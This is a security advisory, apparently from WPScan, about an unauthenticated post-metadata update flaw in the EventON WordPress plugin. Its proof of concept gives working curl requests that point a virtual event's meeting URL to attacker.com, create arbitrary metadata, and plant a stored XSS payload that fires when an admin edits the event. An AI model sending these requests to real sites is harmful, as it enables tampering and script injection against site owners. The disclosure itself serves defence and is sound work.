WordPress Plugin Vulnerabilities
EventON (Free < 2.2.8, Premium < 4.5.6) - Unauthenticated Arbitrary Post Metadata Update
Description
The plugins do not have authorisation in an AJAX action, and does not ensure that the post to be updated belong to the plugin, allowing unauthenticated users to update arbitrary post metadata.
Note: Such issue could lead to Unauthenticated Stored XSS due to the lack of sanitisation in the Free plugin before 2.7.7 and Premium before 4.5.5
Proof of Concept
To set the Meeting URL to https://attacker.com/ on the Virtual Event with ID 240: curl -X POST --data "eid=240&values[_vir_url]=https://attacker.com/" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta' To set the my_meta metadata (if it does not exist, it will be created as a custom field) to attacker on the post with ID 20: curl -X POST --data "eid=20&values[my_meta]=attacker" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta' This can lead to Stored XSS in Free < 2.7.7 and Premium <= 4.5.4 curl -X POST --data 'eid=240&values[_evcal_ec_f1a1_cus]=" style=animation-name:rotation onanimationstart=alert(/XSS/)//' 'https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta' The XSS will be triggered when an admin will edit the event in the backend
Affects Plugins
Fixed in 4.5.6
Fixed in 2.2.8 References
CVE
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
Miscellaneous
Original Researcher
Erwan LR (WPScan)
Submitter
Erwan LR (WPScan)
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-01-10 (about 4 months ago)
Added
2024-01-10 (about 4 months ago)
Last Updated
2024-01-30 (about 3 months ago)
WPScan 